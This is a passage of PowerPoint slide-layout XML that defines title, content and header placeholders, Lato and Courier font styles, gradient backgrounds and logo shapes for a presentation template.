            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855A5A0B-B40B-D004-EC89-1EBDB555AE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7C9EC1-253A-C67A-E32A-A1ABD47E1581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85B862B-D630-6269-4DC5-EBE154BCE025}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33584F34-F471-AFA9-53AB-38F39B3486F8}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5337169-B4C5-BA5C-F951-A79C1E824589}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9542F-14DC-1CB0-007D-F74C65545FF7}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5A3453-F3E8-769B-935A-390398D0095F}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324157707"/>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3_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="4000">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="65000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="1"/>
        </a:gra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rgbClr val="415869"/>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rgbClr val="415869"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791F8201-5505-FD72-A517-E9D1C9AC186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4F7F73-1260-AFA2-0056-34EFDDCC319A}"/>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5" name="Freeform 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CEBAEE-1648-55E5-664C-BB54DE156F6B}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3673B87E-F35D-2951-53A6-CCF066C524EA}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE022A3A-1368-259A-0E03-2F09EDA3F880}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648C2FE-501E-D625-5C16-26CBA697C8F1}"/>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rgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3733865371"/>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Content_Light_Title_3_Category_headers">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DF088D2-4CAC-744C-B5A9-5355331A734B}"/>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5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28043F60-52CB-6C48-837B-EB652A47D572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93791DED-B2BA-134C-99AC-CC7D98443ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480961" y="2235131"/>
            <a:ext cx="3375405" cy="3607530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="463550" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="630238" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:defRPr sz="1100" b="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1D0EB74-FDC6-304B-BF06-5ED242B6AC52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480961" y="1358666"/>
            <a:ext cx="3375405" cy="738358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Paragraph Header Text Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E427005E-691F-5B48-ABBA-FC8E027CCCD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508141" y="2235131"/>
            <a:ext cx="3375405" cy="3607530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="463550" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="630238" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="693738" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:defRPr sz="1100" b="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4332FC9D-E1B8-1A47-879B-C172D07BDBAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508141" y="1358666"/>
            <a:ext cx="3375405" cy="738358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Paragraph Header Text Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2934898-C683-E04A-967A-CD9D3D9CB888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8535320" y="2235131"/>
            <a:ext cx="3334893" cy="3607530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="463550" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="630238" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="693738" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:defRPr sz="1100" b="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F16F554-F389-DE43-8A2E-0C63D8DB6088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8535320" y="1358666"/>
            <a:ext cx="3334893" cy="738358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Paragraph Header Text Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4397FDA-26CF-62EE-DDDF-B0E811702B07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26648" y="212536"/>
            <a:ext cx="109198" cy="71085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2"/>
              </a:solidFill>
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B0E5F8-5F54-733D-27C5-883247443538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="307640"/>
            <a:ext cx="11472725" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D164AB39-CDE5-38CD-57F9-570A9632D913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9041039" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0C09B4-D446-370F-DCD5-9E07A0FAD0F6}"/>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34" name="Freeform 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395AD71C-F6F9-D47A-C31F-31AADC8D7EB5}"/>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35" name="Freeform 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B00D90-D94A-24E0-FB65-548E05C8EEC2}"/>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36" name="Freeform 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7945CEA5-3F71-562F-A48F-C63FFE12D837}"/>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37" name="Freeform 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA8A8C5-0A4B-23DA-EEC8-1F575BB902D4}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B5A305-15B0-2106-029C-1C29E2DD2F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10343407" y="5842660"/>
            <a:ext cx="1859389" cy="1027215"/>
